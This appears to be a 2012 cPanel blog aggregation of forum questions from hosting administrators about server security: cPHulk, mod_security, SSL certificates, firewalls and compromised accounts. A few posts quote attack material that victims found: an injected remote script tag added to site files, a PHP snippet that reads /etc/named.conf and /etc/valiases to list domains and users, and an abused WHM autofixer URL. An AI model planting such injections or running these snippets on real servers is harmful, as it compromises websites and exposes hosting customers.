[Cpanel Blog] disable special php.ini features with suexec June,2012

Hi,

we are using suexec in order to provide each customer with an own php.ini; is there any possibility to prevent the customers from setting safe_mode to off in their php.ini?

Kind regards,
Christian
disable special php.ini features with suexec
Cpanel Blog Installing a UCC SSL Cert May,2012

[Cpanel Blog] php 5.2.17 security backports question June,2012

Hello,

I run the default apache (2.2.22) and php installation (5.2.17) and installed using easyapache through cpanel/WHM.

Secunia dot com released several security vulnerability notifications today that affect php 5.3x and 5.4x (and presumably 5.2x as well but I could be wrong).

Some of these vulnerabilities were reported today and others about a month ago. Have they already been backported to php 5.2.17 by the cpanel team when installed using easyapache? If not, will they? Or is the only choice to upgrade to the latest version of php 5.3x or 5.4x to be protected against these latest vulnerabilities?

We run many websites and unfortunately trying to get the web developers to update their code to work with php 5.3x and newer is a PITA. I'd still like to run php 5.2x but not if it's going to lead to the server getting rooted through arbitrary code execution vulnerabilities in php 5.2x.

Any info or tips are greatly appreciated.

Thank you!

secunia dot com/advisories/49731/ (cve's listed here)
secunia dot com/advisories/49014/ (cves listed here)
php 5.2.17 security backports question
Cpanel Blog Strange email with attachment from "cpanel" May,2012

[Cpanel Blog] Using PHP to add a custom security policy June,2012

Hi, I just read http://www.cpanel.net/secpolicy.pdf
I was wondering if it's possible to add a custom security policy using PHP?
The PDF seems to mention Perl only.
Using PHP to add a custom security policy
[Cpanel Blog] Share your Mod Security configuration May,2012

[Cpanel Blog] security problem, php and html files vulnerability June,2012

from 2 days I have a problem with some accounts on my some vps with cpanel.

I must find and replace specific string in all accounts, I find in all files php and html on some ftp root this:

<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>

in first line for every file and I must run a conbination od find and sed command for remove it
security problem, php and html files vulnerability
Cpanel Blog can't access our website May,2012

[Cpanel Blog] How can I temporarily NULL ROUTE one of my own IPs? June,2012

I am getting hit by a DDOS SYN FLOOD attack on a couple of currently unused IPs that have been configured on my server.

I just want to remove these IPs temporarily, so that no response (e.g. from Apache) is sent out to the remotely connecting IP.

I know I can have my data center NULL ROUTE these IPs for me, but I would rather just do it myself via shell, or in WHM.

Can this be easily accomplished?

Yes, we have CSF and the SYNFLOOD protections switched on, but at this point I would rather just pull the IPs for a while.

By the way, they are hitting port 443 rather than port 80 for some reason.

Thanks for any ideas here!
How can I temporarily NULL ROUTE one of my own IPs?
[Cpanel Blog] Security bug in cPanel login May,2012

[Cpanel Blog] URGENT: mod_security trivial bypass in versions < 2.6.6 (cpanel uses 2.6.3) June,2012

I've just learnt that there is an exploit in the wild which makes it trivially easy to bypass mod_security any version prior to 2.6.6

Easyapache is currently bundling 2.6.3 which is vulnerable.

Can 2.6.6 be included in easyapache ASAP ? And if it's going to take weeks to implement, is there any way we can manually mod_security to 2.6.6 until EA has it?
URGENT: mod_security trivial bypass in versions < 2.6.6 (cpanel uses 2.6.3)
Cpanel Blog Directing http to https May,2012

[Cpanel Blog] DNS redirection June,2012

Hello,

i have a question , i have a didicated server with cpanel , and i want for exemple when someone change the nameservers of the domain name to my namservers ns1.myhost.com and ns2.myhost.com it will show a page , because now it doesn't show anything only if the domain is added as account .

Thank you
DNS redirection
[Cpanel Blog] Lost password May,2012

[Cpanel Blog] WHM Attack June,2012

I recently got attacked on my VPS ( which is a hosted VPS with WHM / cPanel on it)

I have cphulk active on it and locks them out after 3 attempts but somehow my root password got changed and a customers site had nice "you've been hacked" messages on it.

What can I do to protect WHM / cPanel?

Help!
WHM Attack
[Cpanel Blog] Security bug in cPanel login May,2012

[Cpanel Blog] Pingdom inaccurate results needs whitelisting - firewall rule update error June,2012

Hi,
we use pingdom's free version to monitor whether our site is up/down.
It sometimes gives a series of 'server down' email alerts when the website can actually be reached quite normally.
It would be easy to write it off as a buggy service that gives wrong or inaccurate results, except for the fact that a lot of pingdom users seem to be very happy and sure that pingdom alerts are fairly accurate.

It seems that it is mostly a firewall issue - where if you have blocked an IP range due to some malicious activity from that region, and pingdom happens to have a server in that IP range, it reports a down alert as the ping is blocked.

These are the relevant links I found:
Simple tool to list Pingdom Probe IPs
Automatically update iptables rules for Pingdom monitors. | Personal blog of Chris Ergatides
Automatically update Pingdom firewall rules | MG IT Solutions

However when I tried out the last one - a script named update_pingdom_servers.sh, it gave a series of errors:
Quote: iptables: Bad rule (does a matching rule exist in that chain?)
iptables: No chain/target/match by that name We are using csf+lfd as well and every blacklist entry in cphulkd is also entered into csf+lfd blacklist manually.

The alternative, as far as I understand would be to manually whitelist the IPs from the pingdom IP feed here: https://my.pingdom.com/probes/feed

Any pointers on how to fix this?

Any help is greatly appreciated.
Thanks in advance,
Dave
Pingdom inaccurate results needs whitelisting - firewall rule update error
Cpanel Blog can't access our website May,2012

[Cpanel Blog] mod_security Ruleset comparsions June,2012

What are cPanel admins opinion of the various rulesets available for mod_security and how well they work on cPanel hostings 11.32 and up.

Which rulesets offer better integration into cPanel
Is it possible to automatically have the latest rulesets applied
Are there an caveat for using particular rule sets?
besides gotroot and OWASP ModSecurity Core Rule Set are there other rule sets users would recommend?
mod_security Ruleset comparsions
[Cpanel Blog] Beast TLS Vulnerability May,2012

[Cpanel Blog] Prevent other apps from sending mail besides exim June,2012

We have exim running on a server and got a notice that a client is sending spam. Unfortunately the mail is not going through exim as far as I can tell and there's nothing in the logs about it as a result.

How can we prevent other scripts that are running perhaps (couldn't find it in the process list currently but maybe they were before) from using outbound port 25? I only want exim to be able to use it.
Prevent other apps from sending mail besides exim
[Cpanel Blog] Is cPHulk working properly? June,2012

[Cpanel Blog] Best Anti Virus software for linux centos cPanel/WHM June,2012

Hello,

can you guys let me know Best Anti Virus software for linux centos cPanel/WHM ???

Please don't suggest me ClamAV its really poor, recently our client's website got Hacked by the hackers & i scanned that website to check how many pages are infected, but ClamAV says website is OK
Best Anti Virus software for linux centos cPanel/WHM
[Cpanel Blog] Site Down due to IP flood? May,2012

[Cpanel Blog] Clients unsuspending suspended locked accounts. June,2012

I have users that are unsuspending accounts at will when I lock and suspend an account.

How do I fix this?
Clients unsuspending suspended locked accounts.
Cpanel Blog Globalsign OneClickSSL WHM/cPanel Addon Not Working May,2012

[Cpanel Blog] Notified of compromised account: Where to go from here June,2012

A wordpress site on 1 of my hosts running WHM 11.32.3 build 19 was listed as a phishing website. I've disabled the account but I was hoping for advise on where to go from here to try and find as much detail as possible as to how the site was compromised and how to improve my security to stop it happening in the future as I have other wordpress sites.

The site admin of the compromised site can be considered awol
Notified of compromised account: Where to go from here
[Cpanel Blog] Report of a cpanel CSRF 0 day on twitter May,2012

[Cpanel Blog] How to disallow normal user read named.conf file? June,2012

Hacker run a PHP script on an user account and can list all the domains and users on the same server. I have no evidence showing they can get the password, but it's not good to reveal the user ID.

The script is simple, it gets the domain name from /etc/named.conf file, then get the users from /etc/valiases/. I tested with a normal user, but it does not have permission to read the files under /etc/valiases/. How can this PHP script read it?

Thanks for any help.

Code: ls -lah /etc/valiases/
/bin/ls: /etc/valiases/: Permission deniedHack code snippet:

Code: $d0mains = @file("/etc/named.conf"); Code: $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
How to disallow normal user read named.conf file?
[Cpanel Blog] CSF and Google bots ??? May,2012

[Cpanel Blog] MySQL vulnerability June,2012

Hello,

oss-sec: Security vulnerability in MySQL/MariaDB sql/password.c

Are the cPanel MySQL binaries vulnerable?

Thank you,
Nibin.
MySQL vulnerability
[Cpanel Blog] Security bug in cPanel login May,2012

[Cpanel Blog] whm save password June,2012

For those of us who are the only user of our particular computer, having the "save password"
makes it difficult to periodically change the password for WHM, especially using the google
chrome browser. In WHM, there should be a "check box" to "check" to save the password
or leave "unchecked" to not save it; this should be an option in the "settings" config,
similar to Allow autocomplete in login screens, perhaps the next line in the WHM settings. .

If programmed properly, it SHOULD update the pass that is saved upon login, rather than forcing
us to delete all cookies, cache, etc. , whenever we would like to change the password, such as after a certain time period or whatever other criteria we utilize to change password..

Thank you for all the improvments over the years to cPanel & WHM.
whm save password
[Cpanel Blog] Ip in spamhaus CBL May,2012

[Cpanel Blog] Jailed SSH? June,2012

Hey guys! I'm currently trying out CPanel as I'm thinking about moving from Plesk.

In Plesk I have a option under the settings for an account that says "Chrooted" for SSH access. When choosing this mode the user is jailed to his home directory and can't browse anything below it. Also the commands are very restricted and only allows about 100 of them.

In Cpanel I've set the user account to "Jailed Shell" but I don't see any different really. I have 1257 commands to use, and when logged in as root I have 1279 commands. Also I can browse below my home directory and even list /.

Isn't there any settings to jail the SSH user to a certain amount of commands and of course their home directory?

I use GIT to update all my clients on the server so I need SSH access.
Jailed SSH?
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012

[Cpanel Blog] Comparison of Firewalls June,2012

Hello staff,

In your opinion, what is the best firewall listed below? And Why?

Firewalls: CSF | APF/BFD | FireStarter | Shorewall

If you know any firewall better than the ones mentioned above, post the name for us. :)
Comparison of Firewalls
[Cpanel Blog] Intsalling SAN SSL Certificate May,2012

[Cpanel Blog] Custom Security Police June,2012

I need to create a custom security police: http://www.cpanel.net/secpolicy.pdf

The idea is to block access to WHM only for the users in the Wheel Group unless they are accessing from a determined IP Range.

That way we could avoid potential hacks using the unfamous "scripts2/doautofixer?autofix=safesshrestart". (That script null any other security measure done to avoid undesired connections via SSH)

Any ideas where to start?

Any "Hello Word" security policy?

Regards
--
En Ibague - Comunidad de Ibague - Inicio
Custom Security Police
[Cpanel Blog] multiple servers sharing security information May,2012

[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012

I've just rebuild my server after a disk failure and mostly things have gone smoothly.

When I installed the SSL cert for one of my domains, I used the same procedure as with every other SSL cert I've installed. The server auto-detected the key and the CA bundle just fine and in all browsers except firefox, the cert loads without error.

For this one site, Firefox reports an invalid certificate chain, and the SSL test at https://www.ssllabs.com/ssltest/index.html reports incomplete chain.

I've gone to comodo and downloaded their full CA bundle and installed it. I've checked the apache config files and it is serving the CA bundle I expect and I've checked and the CA bundle is identical to other domains on the server with certs from the same provider.

The only difference I can find is the QUALYS SSL Labs reports the chain length for a site without this problem is 3 (3788 bytes) and for the site with this problem as 1 (1318 bytes)

What I can't figure out is - where/how is this chain length being specified?
Did I just get a bum cert and it needs to be re-issued, or is there some other problem here.
Incomplete SSL Chain problem in Firefox
[Cpanel Blog] Apache security May,2012

[Cpanel Blog] Single SSL certificate, multiple services + Apache June,2012

Hi,

Done quite a few searches about this, but I do need a confirmation from an expert (Where are thou Tristan?) about a few questions I have:

A) On the "Manage Service SSL Certificates" page: can I install a single purchased certificate, issued for my hostname (host.mydomain.com), on all and every services (Exim, Dovecot, etc.) AND as a shared SSL certificate (which covers SSL for Apache only I gather)?

B) On the "Install a SSL Certificate and Setup the Domain" page: for the Apache shared SSL certificate, do I set the user to "nobody"?

C) Does the third textarea of the page listed in point B) with the "Paste the ca bundle here (optional)" caption needs to be filled with the Intermediate CA Certificate (I bought a positiveSSL certificate from Comodo)?

D) Is there any other specific steps outside of these two pages that I should consider to accomplish my goal of eliminating all warnings for my system as a whole?

E) When the certificate renewal comes, what is the least painful way to accomplish it (link welcomed)?

I will consider any human answering these questions as a personal friend to the death or until my server crashes and burns, whichever comes first.

Thanks :-)
Single SSL certificate, multiple services + Apache
[Cpanel Blog] specific rule on modsecurity to scan any uploaded file May,2012

[Cpanel Blog] Is cPHulk working properly? June,2012

I'm not sure if cPHulk is working properly or not. Could somone please confirm this for me.

The Logwatch email shows the following attempted attacks.. All the IPs have been blocked, but I'm not sure if its before or after the numbers got so high. I also noticed that the usernames had up to 1323 login attempts but were blocked for two weeks for 30 attempts.


Logwatch email (I've stripped out the IPs)
Failed logins from:
IP1: 333 times
IP2: 1374 times
IP3: 210 times
IP4: 223 times

Illegal users from:
IP1: 3520 times
IP2: 2815 times
IP3: 427 times
IP4: 9948 times


My settings

IP Based Brute Force Protection Period in minutes: 15
Brute Force Protection Period in minutes: 5
Maximum Failures By Account: 15
Maximum Failures Per IP: 10
Maximum Failures Per IP before IP is blocked for two week period: 30

Send a notification upon successful root login when the IP is not whitelisted: off
Extend account lockout time upon additional authentication failures: on
Send notification when brute force user is detected: off
Is cPHulk working properly?
[Cpanel Blog] how to protect whm/cpanel (the host web application ) using mod_security? May,2012

[Cpanel Blog] disable cphulk per-account blacklists June,2012

On every server I set up, it always ends within a few days that an indeterminable number of foreign servers have pounded enough on the server login to lock-out the "root" login account (and several others), and continue to do so such that the accounts stay locked indefinitely. Essentially this turns cphulkd into a DDoS assistance toolkit.

I don't mind the idea of blacklisting IP addresses -- there's nothing wrong there. But I need to be able to disable the per-account lockout functionality. I though that setting "Maximum Failures By Account" to "0" would do this. But it apparently does not -- it instead locks out accounts after the first login failure.

Is there a way to disable the account lockout function? Or do we just have to throw away cphulk completely?

Also, for the love of all that's holy, don't suggest whitelists. It doesn't solve the problem, just pushes it around a little.
disable cphulk per-account blacklists
Cpanel Blog Directing http to https May,2012

[Cpanel Blog] Do I need ipv6 enabled? June,2012

This may be a dumb question, but frankly I do not know the answer. I have always used CSF on my server and have disabled ipv6 as recommended by it.

Now, I am starting to wonder if this was the correct thing to do? Am I preventing others in the world from accessing the domains, email, etc hosted on my server by having ipv6 disabled? Basically I am just wondering if 'people' trying to view my websites, send email to me, etc are being denied access if that makes sense.

- All of 'my' ip's associated with the server are ipv4

- WHM 11.32.2 (build 28)

- CENTOS 5.8 x86_64 standard
Do I need ipv6 enabled?
Cpanel Blog Directing http to https May,2012

[Cpanel Blog] cPanel Security Measures June,2012

Can anyone please guide what security steps are necessary while setting up a new cpanel server? I would like to keep it the most secure for my clients so that they are not affected by exploits in WordPress and other content management systems.
cPanel Security Measures
[Cpanel Blog] Mod_Evasive May,2012

[Cpanel Blog] ...A new self-signed certificate was installed to replace it. June,2012

This morning (June 1) I began getting warning messages when trying to check email that our secure certificate was expired. Since everyone is connecting to SSL ports for email, everyone got the message when trying to do a send/receive and was prevented from doing so until I could reset the cert. This is the message I was sent from WHM:

"The SSL certificate for courier-imapd on server.domain.com expired. A new self-signed certificate was installed to replace it."

"The SSL certificate for courier-pop3d on server.domain.com expired. A new self-signed certificate was installed to replace it."

If you purchased the expired certificate from a certificate authority, you should replace the self-signed certificate as soon as possible. You can do this using WHM's "Manage Service SSL Certificates" interface: https://server.domain.com:2087/scrip...ageservicecrts (Main >> Service Configuration >> Manage Service SSL Certificates)"

Why did this occur? We use a wildcard cert that doesn't expire until 2015 for all our services located in "Main >> Service Configuration >> Manage Service SSL Certificates" and only the mail related certs were reset by WHM, thankfully, but I would like to know if this can be prevented in the future.

Thanks,

Michael
...A new self-signed certificate was installed to replace it.
[Cpanel Blog] I need help -- server got hacked, php injection May,2012

[Cpanel Blog] Root was logged into dovecot using following authentication service: system June,2012

Root was logged into dovecot using following authentication service: system

Reverse DNS: r54h244.dixie-net.com

Origin Country: United States (US)

Please use the following links to add to the black list:

Single Ip: https://server.name:2087/cgi/bl.cgi?ip=64.49.54.244

I have swapped mail server selection back to Courier, not sure if they could have done more harm?

Ok, False Alarm it seems, but thousands of access attempts.
Not sure why my firewall didn't stop him in time.
Root was logged into dovecot using following authentication service: system
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012

[Cpanel Blog] WHM password only 8 chars long! June,2012

If you set the root whm password to e.g. 1234567890123, you can login even if you type only 12345678 !!!

It seems that characters after the 8th are ignored!
WHM password only 8 chars long!
[Cpanel Blog] PCI Complianc with SecurityMetrics - Weak Ciphers May,2012